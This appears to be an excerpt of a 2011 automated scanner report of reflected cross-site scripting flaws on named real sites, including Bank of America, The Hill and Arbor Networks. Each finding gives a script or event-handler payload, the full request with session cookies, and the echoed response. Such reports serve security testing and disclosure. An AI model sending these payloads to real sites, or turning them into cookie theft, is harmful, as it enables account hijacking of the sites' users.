The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 66ae8<a>a5a81e35302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/WareSeekercom/ROS66ae8<a>a5a81e35302/tags.js HTTP/1.1 Host: tags.expo9.exponential.com Proxy-Connection: keep-alive Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
function expo9_ad() { var t = this; t.host = "a.tribalfusion.com"; t.site = "wareseekercom"; t.adSpace = "ros66ae8<a>a5a81e35302"; t.tagKey = "1282868635"; t.tKey = e9TKey; t.pageId = expo9_pageId; t.center = 1; t.flashVer = 0; t.tagHash = makeTagHash(); t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650aa'><script>alert(1)</script>2295b33377e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1 Host: thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Thu, 03 Feb 2011 01:20:18 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Set-Cookie: PHPSESSID=en4idpn2cplbg96q3m2b2f49c7; path=/ Connection: close Content-Length: 73997
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <a href='/blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more#comments'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f52a1'><script>alert(1)</script>1f00b24b3b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4 HTTP/1.1 Host: thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 02:00:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Thu, 03 Feb 2011 02:15:21 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Set-Cookie: PHPSESSID=2tr8nhs6ici1dq18j4impjn8o0; path=/ Connection: close Content-Length: 76050
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4#comments'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 was submitted in the REST URL parameter 4. This input was echoed as 84351'><img src=a onerror=alert(1)>b4355392092 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 HTTP/1.1 Host: thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Thu, 03 Feb 2011 01:20:19 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Set-Cookie: PHPSESSID=4tgmbjdtk4fojqqj58b8p4hiq3; path=/ Connection: close Content-Length: 74000
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img src=a onerror=alert(1)>b4355392092#comments'> ...[SNIP]...
The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c7f"style%3d"x%3aexpression(alert(1))"3660fe20f2a was submitted in the ZCode parameter. This input was echoed as 82c7f"style="x:expression(alert(1))"3660fe20f2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cce12'style%3d'x%3aexpression(alert(1))'28b5d32a9d was submitted in the ZCode parameter. This input was echoed as cce12'style='x:expression(alert(1))'28b5d32a9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 889f8"><script>alert(1)</script>a4569f63444 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_performs&formid=20&Itemid=76889f8"><script>alert(1)</script>a4569f63444&id=112 HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba0d0"><script>alert(1)</script>718295ddb4 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_performs&formid=20&Itemid=76&id=112ba0d0"><script>alert(1)</script>718295ddb4 HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
3.72. http://www.arbornetworks.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.arbornetworks.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458c5"><script>alert(1)</script>6fafaf87cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_performs&formid=20&Itemid=76&id=112&458c5"><script>alert(1)</script>6fafaf87cd=1 HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b49"><script>alert(1)</script>f4d8274700e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /creditcardsa4b49"><script>alert(1)</script>f4d8274700e/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:10 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fa1"><script>alert(1)</script>1cb498be8e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /depositse9fa1"><script>alert(1)</script>1cb498be8e3/checksave/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:53 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1655092907.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491c6"><script>alert(1)</script>20cb5e334dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /deposits/checksave491c6"><script>alert(1)</script>20cb5e334dd/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:54 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac50f"><script>alert(1)</script>4765bb30cc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /financialtoolsac50f"><script>alert(1)</script>4765bb30cc9/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:36:08 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee12"><script>alert(1)</script>8e3b0539708 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /finditbee12"><script>alert(1)</script>8e3b0539708/locator.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:35:37 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58bd1"><script>alert(1)</script>2153a6eecc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /help58bd1"><script>alert(1)</script>2153a6eecc8/equalhousing.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:33:29 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddc5"><script>alert(1)</script>c62490d0000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /helpbddc5"><script>alert(1)</script>c62490d0000/equalhousing_popup.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:25 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1453766315.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec464"><script>alert(1)</script>899a7c53100 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /helpec464"><script>alert(1)</script>899a7c53100/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:33:44 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e1"><script>alert(1)</script>5ff4d40fe3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /loansandhomesa99e1"><script>alert(1)</script>5ff4d40fe3b/index.cfm?template=lc_mortgage HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:35:59 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 864f9"><script>alert(1)</script>190e5f7b296 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /onlinebanking864f9"><script>alert(1)</script>190e5f7b296/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:00 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88c92"><script>alert(1)</script>201cd186128 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pap88c92"><script>alert(1)</script>201cd186128/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:13 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede62"><script>alert(1)</script>778b0ce2212 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /studentbankingede62"><script>alert(1)</script>778b0ce2212/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:58 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=866563755.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544ce"><script>alert(1)</script>45ae18a6011 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle_and_personal_loans544ce"><script>alert(1)</script>45ae18a6011/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:20 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of the city request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a923</script><script>alert(1)</script>09ca345e6cd was submitted in the city parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
